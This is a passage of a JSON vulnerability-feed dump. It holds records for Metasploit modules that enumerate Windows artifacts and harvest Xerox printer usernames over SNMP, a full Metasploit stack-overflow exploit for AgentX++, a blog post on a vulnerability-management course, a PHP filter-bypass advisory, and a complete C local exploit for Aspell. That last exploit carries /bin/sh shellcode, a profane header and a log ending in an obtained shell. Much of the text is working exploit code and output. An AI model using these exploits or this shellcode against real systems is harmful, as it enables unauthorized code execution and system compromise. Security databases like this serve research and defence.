registry for particular artifacts. The\n list of artifacts is read from data/post/enum_artifacts_list.txt or a user specified file. Any\n matches are written to the loot. },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'averagesecurityguy <stephen[at]averagesecurityguy.info>' ],\n 'Platform' => [ 'win' ],\n 'SessionTypes' => [ 'meterpreter' ]\n ))\n\n register_options(\n [\n OptPath.new( 'ARTIFACTS',\n [\n true,\n 'Full path to artifacts file.',\n ::File.join(Msf::Config.data_directory, 'post', 'enum_artifacts_list.txt')\n ])\n ])\n end\n\n def run\n # Store any found artifacts so they can be written to loot\n evidence = {}\n\n # Load artifacts from yaml file. Artifacts are organized by what they\n # are evidence of.\n yaml = YAML::load_file(datastore['ARTIFACTS'])\n yaml.each_key do |key|\n print_status(\"Searching for artifacts of #{key}\")\n files = yaml[key]['files']\n regs = yaml[key]['reg_entries']\n found = []\n\n # Process file entries\n vprint_status(\"Processing #{files.length.to_s} file entries for #{key}.\")\n\n files.each do |file|\n digest = file_remote_digestmd5(file['name'])\n # if the file doesn't exist then digest will be nil\n next if digest == nil\n if digest == file['csum'] then found << file['name'] end\n end\n\n # Process registry entries\n vprint_status(\"Processing #{regs.length.to_s} registry entries for #{key}.\")\n\n regs.each do |reg|\n rdata = registry_getvaldata(reg['key'], reg['val'])\n if rdata.to_s == reg['data']\n found << reg['key'] + '\\\\' + reg['val']\n end\n end\n\n # Did we find anything? If so store it in the evidence hash to be\n # saved in the loot.\n if found.empty?\n print_status(\"No artifacts of #{key} found.\")\n else\n print_status(\"Artifacts of #{key} found.\")\n evidence[key] = found\n end\n end\n\n save(evidence, \"Enumerated Artifacts\")\n end\n\n def save(data, name)\n str = \"\"\n data.each_pair do |key, val|\n str << \"Evidence of #{key} found.\\n\"\n val.each do |v|\n str << \"\\t\" + v + \"\\n\"\n end\n end\n\n f = store_loot('enumerated.artifacts', 'text/plain', session, str, name)\n print_good(\"#{name} stored in: #{f}\")\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/windows/gather/enum_artifacts.rb"}, {"lastseen": "2019-11-25T17:20:32", "bulletinFamily": "exploit", "description": "This module will do user enumeration based on the Xerox WorkCentre present on the network. SNMP is used to extract the usernames.\n", "modified": "2017-07-24T13:26:21", "published": "2011-03-23T16:13:37", "id": "MSF:AUXILIARY/SCANNER/SNMP/XEROX_WORKCENTRE_ENUMUSERS", "href": "", "type": "metasploit", "title": "Xerox WorkCentre User Enumeration (SNMP)", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::SNMPClient\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'Xerox WorkCentre User Enumeration (SNMP)',\n 'Description' => %q{\n This module will do user enumeration based on the Xerox WorkCentre present on the network.\n SNMP is used to extract the usernames.\n },\n 'Author' =>\n [\n 'pello <fropert[at]packetfault.org>'\n ],\n 'License' => MSF_LICENSE\n )\n end\n\n def run_host(ip)\n begin\n snmp = connect_snmp\n\n if snmp.get_value('sysDescr.0') =~ /Xerox/\n @users = []\n 285222001.upto(285222299) { |oidusernames|\n snmp.walk(\"1.3.6.1.4.1.253.8.51.5.1.1.4.151.#{oidusernames}\") do |row|\n row.each { |val| @users << val.value.to_s if val.value.to_s.length >= 1 }\n end\n }\n print_good(\"#{ip} Found Users: #{@users.uniq.sort.join(\", \")} \")\n\n @users.each do |user|\n report_note(\n :host => rhost,\n :port => datastore['RPORT'],\n :proto => 'udp',\n :sname => 'snmp',\n :update => :unique_data,\n :type => 'xerox.workcenter.user',\n :data => user)\n end\n end\n\n # No need to make noise about timeouts\n rescue ::Rex::ConnectionError, ::SNMP::RequestTimeout, ::SNMP::UnsupportedVersion\n rescue ::Interrupt\n raise $!\n rescue ::Exception => e\n print_error(\"#{ip} Error: #{e.class} #{e} #{e.backtrace}\")\n ensure\n disconnect_snmp\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/snmp/xerox_workcentre_enumusers.rb"}, {"lastseen": "2019-11-29T09:38:19", "bulletinFamily": "exploit", "description": "This exploits a stack buffer overflow in the AgentX++ library, as used by various applications. By sending a specially crafted request, an attacker can execute arbitrary code, potentially with SYSTEM privileges. This module was tested successfully against master.exe as included with Real Network\\'s Helix Server v12. When installed as a service with Helix Server, the service runs as SYSTEM, has no recovery action, but will start automatically on boot. This module does not work with NX/XD enabled but could be modified easily to do so. The address\n", "modified": "2017-07-24T13:26:21", "published": "2010-05-05T20:05:39", "id": "MSF:EXPLOIT/WINDOWS/MISC/AGENTXPP_RECEIVE_AGENTX", "href": "", "type": "metasploit", "title": "AgentX++ Master AgentX::receive_agentx Stack Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::Tcp\n #include Msf::Exploit::Remote::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'AgentX++ Master AgentX::receive_agentx Stack Buffer Overflow',\n 'Description' => %q{\n This exploits a stack buffer overflow in the AgentX++ library, as used by\n various applications. By sending a specially crafted request, an attacker can\n execute arbitrary code, potentially with SYSTEM privileges.\n\n This module was tested successfully against master.exe as included with Real\n Network\\'s Helix Server v12. When installed as a service with Helix Server,\n the service runs as SYSTEM, has no recovery action, but will start automatically\n on boot.\n\n This module does not work with NX/XD enabled but could be modified easily to\n do so. The address\n },\n 'Author' => [ 'jduck' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2010-1318' ],\n [ 'OSVDB', '63919'],\n [ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=867' ]\n ],\n 'Privileged' => true,\n 'DefaultOptions' =>\n {\n #'EXITFUNC' => 'seh',\n },\n 'Payload' =>\n {\n 'Space' => 1024, # plenty of space\n 'BadChars' => \"\", # none!\n 'DisableNops' => true,\n 'PrependEncoder' => \"\\x81\\xc4\\xf0\\xef\\xff\\xff\"\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Helix Server v12 and v13 - master.exe',\n {\n # The BufAddr varies :-/\n #'BufAddr' => 0xea3800,\n 'BufAddr' => 0x1053880,\n 'BufSize' => 25000, # If this is too large, the buf is unmapped on free\n 'Ret' => 0x46664b, # mov esp,ebp / pop ebp / ret in master.exe\n 'JmpEsp' => 0x7c3d55b7 # jmp esp from bundled msvcp71.dll\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Apr 16 2010'))\n\n register_options([Opt::RPORT(705)])\n end\n\n def exploit\n print_status(\"Trying target #{target.name}...\")\n\n connect\n print_status(\"Triggering the vulnerability... Cross your fingers!\")\n\n num = target['BufSize']\n num_str = [num].pack('N')\n\n # First send 19 bytes to almost fill the buffer...\n hdr = ''\n hdr << [0x01, rand(256), 0x10 | rand(256), rand(256)].pack('CCCC')\n hdr << rand_text(16 - hdr.length)\n #hdr << \"QQQQRRRRSSSS\"\n hdr << num_str[0,3]\n sock.put(hdr)\n\n # Wait to make sure it processed that chunk.\n select(nil, nil, nil, 0.5)\n #print_status(\"press enter to trigger...\"); x = $stdin.gets\n\n # Send the rest (smashed!)\n hdr = ''\n hdr << num_str[3,1]\n\n # NOTE: this stuff is extra, but doesn't count towards the payload..\n hdr << rand_text(8)\n #hdr << \"EEEEFFFF\"\n\n # becomes ebp\n #hdr << \"\\xeb\" * 4\n base = target['BufAddr']\n new_ebp = base + (num / 2)\n if (mod4 = (num % 4)) > 0\n # align to 4 bytes\n new_ebp += (4 - mod4)\n end\n hdr << [new_ebp].pack('V')\n\n # becomes eip\n #hdr << \"\\xef\\xbe\\xad\\xde\"\n hdr << [target.ret].pack('V')\n\n # NOTE: sending more data will smash the low (up to 3) bytes of the socket handle -- no fun\n sock.put(hdr)\n\n # Send the data that we said we would...\n stack = []\n stack << target['JmpEsp']\n\n num_rets = (num - payload.encoded.length - 4) / 4\n num_rets.times {\n # points to ret instruction\n stack.unshift(target.ret + 3)\n }\n\n stack = stack.pack('V*')\n stack << payload.encoded\n # make sure we have all the bytes, or we wont reach the path we want.\n stack << rand_text(num - stack.length)\n\n sock.put(stack)\n\n handler\n disconnect\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/misc/agentxpp_receive_agentx.rb"}], "avleonov": [{"lastseen": "2019-05-29T14:19:28", "bulletinFamily": "blog", "description": "In the last three weeks, I participated in [Tinkoff Fintech School](<https://fintech.tinkoff.ru/tfschool/about>) - educational program for university students. Together with my colleagues, we prepared a three-month [practical Information Security course](<https://fintech.tinkoff.ru/tfschool/infsec>): 1 lecture per week with tests and home tasks. \n\nEach lecture is given by a member of our security team, specialized in one of the following modules: **Vulnerability Management**, Application Security, Infrastructure Security, Network Security, Virtualization Security, Banking Systems Security, Blue &amp; Red-teaming, etc.\n\n[](<https://avleonov.com/wp-content/uploads/2019/03/vm_fintech.png>)\n\nThe course is still ongoing, but my Vulnerability Management module is over. Therefore, I want to share my impressions and some statistics.\n\n### Lecture\n\nThe content was pretty much the same as for [my lecture at MIPT ](<https://avleonov.com/2018/12/29/mipt-phystech-guest-lecture-vulnerabilities-money-and-people/>)in December last year. I removed some boring slides about Vulnerability Databases, added some [more critics of Vulnerability Management products](<https://avleonov.com/2018/12/21/guinea-pig-and-vulnerability-management-products/>), their [reports](<https://avleonov.com/2019/01/12/whats-wrong-with-patch-based-vulnerability-management-checks/>) and [detection methods](<https://avleonov.com/2019/02/11/no-left-boundary-for-vulnerability-detection/>). And I also updated information about [open vacancies](<https://avleonov.com/2019/02/04/open-positioner-my-new-project-for-tracking-it-and-security-jobs/>) related to Vulnerability Management.\n\n### Testing\n\nIn the beginning of each lecture, students should solve some tests based on the materials of the previous lecture. Basically it is for motivating them to visit lectures. \n\nI always wondered why Information Security tests are always so weird. They either check the knowledge of some terms or definitions invented by some nonames or the knowledge of reference data, the markings of fire extinguishers in the CISSP exam, for example. Or it is a fascinating game: guess the logic of the individual, who made this question. Anyway, it's far from the real life and the real practice. \n\nWell, I thought so until I had to make my own questions.  It turned out that it's pretty hard to make them unambiguous, reasonable and not based on the subjective experience. As a result, the questions were about Vulnerability Management process, [Vulnerability life cycle](<https://avleonov.com/2019/01/30/vulnerability-life-cycle-and-vulnerability-disclosures/>), [basic vulnerability types](<https://avleonov.com/2018/11/29/making-vulnerable-web-applications-xxs-rce-sql-injection-and-stored-xss-buffer-overflow/>), and Vulnerability Detection issues. All this were in the lecture. Many students answered all the questions correctly, so it seems to me that the test wasn't bad.\n\n### Homework\n\nAnd the most interesting and intriguing part was the homework. There were 2 tasks and the deadline was two weeks. \n\n#### Task 1. Vulnerability Detection and Exploitation\n\n_Deploy virtual machines in your home environment:_\n\n 1. _Vulnerable Target host (for example, Metasploitable or an old version of Windows/Linux)_\n 2. _Vulnerability Scanner (for example, Nessus Home, OpenVAS, Nexpose Community)_\n 3. _Exploitation Tool (for example, Metasploit or some separate exploits)_\n\n_Run vulnerable service on a Vulnerable Target host (for example, SSH), detect vulnerability with Vulnerability Scanner, exploit a vulnerability and get remote access to the host. Make a report how you did it step by step and describe each of your choices. _\n\n_Bonus: write your own detection script for the exploited vulnerability._\n\nIn this task I wanted the students to see \n\n * how the vulnerability could be detected and exploited;\n * that the Vulnerability Scanner is not some magical tool and they can make a small scanner on their own.\n\nThe task was intentionally formulated in a very wide way, without mentioning actual tools and vulnerabilities, because I was curious what exactly would they choose. So, those who are not really interested in the topic could choose something easy, and those who like this stuff could use this task to make an interesting research. \n\nMost of the students chose Metasploitable as a vulnerable target host. Actually, this is the easiest way. But, as you can see, some students chose the usual operating systems: Windows, Ubuntu Linux and docker containers.\n\n\n\nThe same number of students used [Nessus Home](<https://avleonov.com/2016/05/16/tenable-nessus-registration-installation-scanning-reporting/>) and OpenVAS for vulnerability detection. They registered Nessus Home on their own and used it at home environment, so the license agreement was not violated.\n\n\n\nIn most cases students used Metasploit for exploitation. But sometimes it were some custom python scripts or just a curl.\n\n\n\nThey exploited very different vulnerabilities: \n\n\n\n 1. BID:48539 - vsftpd Compromised Source Packages Backdoor Vulnerability \n\n 2. CVE-2004-2687 - DistCC Daemon Command Execution \n 3. CVE-2007-2447 - Samba \"username map script\" Command Execution\n 4. CVE-2008-0166 - Predictable PRNG Brute Force SSH\n 5. CVE-2010-2075 - UnrealIRCD 3.2.8.1 Backdoor Command Execution\n 6. CVE-2015-1427 - Elasticsearch Search Groovy Sandbox Bypass\n 7. **CVE-2017-12617 - Apache Tomcat JSP Upload Bypass / Remote Code Execution**\n 8. CVE-2017-9462 - Mercurial Custom hg-ssh Wrapper Remote Code Exec\n 9. **CVE-2019-0724 - Microsoft Exchange Server Remote Privilege Escalation Vulnerability**\n 10. Distributed Ruby - Distributed Ruby Remote Code Execution\n 11. MS08-067 - Vulnerability in Server Service Could Allow Remote Code Execution\n 12. **MS17-010 - Remote code execution in Microsoft Server Message Block 1.0 (SMBv1) server (EternalBlue)**\n 13. ssh bruteforce - brute-force guess SSH login credentials\n\nI liked the most exploitation of Apache Tomcat RCE (in a docker image), [classical MS17-010](<https://avleonov.com/2017/05/13/wannacry-about-vulnerability-management/>) and new [Microsoft Exchange Server issue](<https://www.tenable.com/blog/proof-of-concept-code-gives-standard-microsoft-exchange-users-domain-administrator-privileges>), because these are the most practical cases. The bruteforce of SSH logins and passwords was not the exploitation that was expected in this task, but why not, this also often happens. \n\nAnd finally the detection scripts. Most of them were unauthenticated and version-based, written in python or bash.\n\n\n\n#### Task 2. Vulnerability Scoring\n\n_Find a new CVE vulnerability without a CVSS vector on _[_nvd.nist.gov_](<https://nvd.nist.gov/>)_ (\"UNDERGOING ANALYSIS\" state) and make CVSS v.3 Base and Temporal Vector for it. Justify your choice. It is advisable to pass the task before the vector will be published on the NVD website._\n\nIn this task I wanted students to see how the criticality of a vulnerability (that Vulnerability Scanner shows) is actually being produced. The vector was not really matter. In fact, it was possible to get Base Vector from the original vulnerability research.  The important part was the justification like \"I chose Attack Vector (AV): Network because\u2026\" just to be seen that this is not a random choice. \n\nAs you can see, very few people take the same vulnerabilities, that is definitely a good sign:\n\n\n\nIt also might be interesting to compare the vector that they've got as a result of this task with the vector from the NVD. Most likely there will the differences because CVSS is pretty subjective. \n\n### In conclusion\n\nThis was my second time when I gave a lecture and the first time I made additional educational content: tests and homework. It was very cool and exciting. I hope the students have their fun too. \n\nThis was only the first module, there is still a lot of content and interesting practical tasks from my colleagues. I hope that all the students will successfully go through all the stages and with some of them we will meet at work or on internship.\n\n", "modified": "2019-03-04T10:38:31", "published": "2019-03-04T10:38:31", "id": "AVLEONOV:54F79F8B5C71E738DB16AEA2DF8FFD2F", "href": "http://feedproxy.google.com/~r/avleonov/~3/VfGsxXaJTBs/", "type": "avleonov", "title": "Vulnerability Management at Tinkoff Fintech School", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:21", "bulletinFamily": "software", "description": "\r\nSummary\r\n\r\nSince PHP 5.2.0 there is a new filtering extension in PHP that is on the one hand supposed to be used by applications to filter user input and on the other hand able to enforce site wide filtering.\r\n\r\nHowever due to its broken design it is possible to sneak POST data through the site wide filter when PHP is compiled with FDF support.\r\nAffected versions\r\n\r\nAffected is PHP &lt;= 5.2.0\r\nDetailed information\r\n\r\nWith PHP 5 a number of input filtering hooks were added to PHP that were only used by Yahoo until the Hardened-PHP Project put some work in them and fixed some obvious bugs. From that day the Hardened-PHP Patch came with a varfilter extension that made use of these hooks to filter user input by variable count, size, shape.\r\n\r\nThen the PHP developers developed ext/filter that was supposed to be bundled with PHP and broke the input filtering system. Because ext/filter does take over the input filtering system and does not give control back to previously defined input filters the new input filtering hooks are dead. The PHP developers knew that Hardened-PHP used these hooks but that did not stop them from intentionally breaking it.\r\n\r\nThe input filtering hooks are designed in a way that at all places were user input is parsed and registered as variables a call to the input filter is added that decides what todo with the variables. The problem with this is that all extensions that add support for other POST content-types need to also implement the hooks, otherwise the data goes unfiltered through.\r\n\r\nWith ext/fdf PHP ships an extension that does add the FDF POST data format but does not call the input filtering. Therefore it is possible to bypass all site wide enforced filters\r\nProof of concept, exploit or instructions to reproduce\r\n\r\nAttached is an exploit that converts the _POST array into POST data in the application/vnd.fdf format and POST it to a URL, bypassing the site wide filter enforced by ext/filter.\r\nNotes\r\n\r\nPHP&#39;s new filtering extension is the next misdesigned feature of PHP that will most probably cause a lot of headaches to developers and especially admins.\r\n\r\nFirst of all the filtering hooks are at the wrong place so that again the filtering will only take place when all loaded extensions &#40;including 3rd party ones&#41; that deal with user input add calls to the filtering hooks.\r\n\r\nAnd secondly ext/filter is written in a way that other people&#39;s filtering extension will not work anymore, because ext/filter does grab the filtering hooks and does not perform daisy chaining. The PHP developers intentionally broke the varfilter extension of Hardened-PHP with this. However Suhosin that should be used instead of HPHP anyway, does work with ext/filter.\r\n\r\nAnd last but not least ext/filter is of course only an optional extension that can be disabled by the admin any time and therefore any PHP applications that relies on it for input filtering will only work if the input filtering extensions is installed.\r\n", "modified": "2007-03-10T00:00:00", "published": "2007-03-10T00:00:00", "id": "SECURITYVULNS:DOC:16320", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:16320", "title": "MOPB-17-2007:PHP ext/filter FDF Post Bypass Vulnerability", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:09:24", "bulletinFamily": "software", "description": "FDF extension doesn&#39;t support filtering.", "modified": "2007-03-10T00:00:00", "published": "2007-03-10T00:00:00", "id": "SECURITYVULNS:VULN:7376", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7376", "title": "PHP FDF POST request filtering protection bypass", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2018-01-27T01:27:02", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category local exploits", "modified": "2004-12-01T00:00:00", "published": "2004-12-01T00:00:00", "id": "1337DAY-ID-7376", "href": "https://0day.today/exploit/description/7376", "type": "zdt", "title": "Aspell (word-list-compress) Command Line Stack Overflow", "sourceData": "=======================================================\r\nAspell (word-list-compress) Command Line Stack Overflow\r\n=======================================================\r\n\r\n\r\n/*\r\n Fuck private exploits .\r\n Fuck iranian hacking (and security !!) teams who are just some fucking kiddies.\r\n Fuck all \"Security money makers\"\r\n \r\n word-list-compress local exploit - SECU\r\n Coded by : c0d3r / root . razavi1366[at]yahoo[dot]com\r\n word-list-compress is not setuid . so good for backdooring .\r\n gratz fly to : LorD - NT - sIiiS - vbehzadan - hyper sec members.\r\n we are : LorD - c0d3r - NT ; irc.persiairc.com 6667 #ihs\r\n*/\r\n\r\n#include<stdio.h>\r\n#include<stdlib.h>\r\n#define NOP 0x90\r\n#define address 0xbffff2b8\r\n#define size 350\r\nunsigned long get_sp(void)\r\n{\r\n __asm__(\"movl %esp, %eax\");\r\n}\r\nint main()\r\n{\r\nchar shellcode[] = /* 37 bytes shellcode written by myself */\r\n\"\\xeb\\x16\\x5b\\x31\\xc0\\x88\\x43\\x07\\x89\\x5b\\x08\\x89\\x43\\x0c\"\r\n\"\\xb0\\x0b\\x8d\\x4b\\x08\\x8d\\x53\\x0c\\xcd\\x80\\xe8\\xe5\\xff\\xff\"\r\n\"\\xff/bin/sh\";\r\nchar exploit[size] ;\r\nchar *ptr;\r\nlong *addr_ptr;\r\nchar test[300];\r\nlong addr;\r\nint NL= 180 ;\r\n\r\nint i ;\r\nint x=0 ;\r\nptr = exploit;\r\naddr_ptr = (long *) ptr;\r\n\r\nfor(i=0;i < size;i+=4){\r\n*(addr_ptr++) = address;\r\n}\r\nfor(i=0 ; i < NL ; i++ )\r\n{\r\nexploit[i] = NOP;\r\n}\r\nif(shellcode != NULL){\r\nwhile(x != strlen(shellcode)){\r\nexploit[NL] = shellcode[x];\r\nNL+=1;x+=1;\r\n}\r\n\r\n }\r\nexploit[size] = 0x00;\r\n\r\nprintf(\"word-list-compress local exploit by root / c0d3r\\n\");\r\nprintf(\"stack pointer: 0x%x\\n\", get_sp());\r\nprintf(\"using return address : 0x%x\\n\", address);\r\nprintf(\"using %d bytes shellcode\\n\", sizeof(shellcode));\r\nsetenv(\"exploit\", exploit, 1);\r\nputenv(exploit);\r\nprintf(\"exploit string loaded into the enviroment\\n\");\r\nsystem(\"echo $exploit | word-list-compress c\");\r\nreturn 0;\r\n}\r\n\r\n/*\r\n\r\n[email\u00a0protected]:/sploits# word-list-compress\r\nCompresses or uncompresses sorted word lists.\r\nFor best result the locale should be set to C\r\nbefore sorting by setting the environmental\r\nvariable LANG to \"C\" before sorting.\r\nCopyright 2001 by Kevin Atkinson.\r\nUsage: word-list-compress c[ompress]|d[ecompress]\r\n[email\u00a0protected]:/sploits#\r\n\r\n************************************************************\r\n\r\n[email\u00a0protected]:/sploits# echo `perl -e 'print \"A\"x300'` |\r\nword-list-compress c\r\nSegmentation fault (core dumped)\r\n[email\u00a0protected]:/sploits# gdb -c core\r\nGNU gdb 6.1.1\r\nCopyright 2004 Free Software Foundation, Inc.\r\nGDB is free software, covered by the GNU General Public License, and you are\r\nwelcome to change it and/or distribute copies of it under certain\r\nconditions.\r\nType \"show copying\" to see the conditions.\r\nThere is absolutely no warranty for GDB. Type \"show warranty\" for details.\r\nThis GDB was configured as \"i486-slackware-linux\".\r\nCore was generated by `word-list-compress c'.\r\nProgram terminated with signal 11, Segmentation fault.\r\n#0 0x41414141 in ?? ()\r\n(gdb) info registers\r\neax 0x0 0\r\necx 0x40154c20 1075137568\r\nedx 0x0 0\r\nebx 0x41414141 1094795585\r\nesp 0xbffff560 0xbffff560\r\nebp 0x41414141 0x41414141\r\nesi 0x41414141 1094795585\r\nedi 0x41414141 1094795585\r\neip 0x41414141 0x41414141\r\neflags 0x210246 2163270\r\ncs 0x23 35\r\nss 0x2b 43\r\nds 0x2b 43\r\nes 0x2b 43\r\nfs 0x2b 43\r\n---Type <return> to continue, or q <return> to quit---\r\n\r\n**********************************************************\r\n\r\n[email\u00a0protected]:/sploits# gcc word-list-compress.c -o word-list-compress\r\nword-list-compress.c:65:2: warning: no newline at end of file\r\n[email\u00a0protected]:/sploits# ./word-list-compress\r\nword-list-compress local exploit by root / c0d3r\r\nstack pointer: 0xbffff268\r\nusing return address : 0xbffff2b8\r\nusing 37 bytes shellcode\r\nexploit string loaded into the enviroment\r\n [1 C[C KS /bin/sh sh-2.05b# echo IHS\r\nIHS\r\nsh-2.05b#\r\n\r\n************************************************************\r\n\r\nthats all . have fun !\r\n*/\r\n\r\n\r\n\n# 0day.today [2018-01-26] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/7376"}]}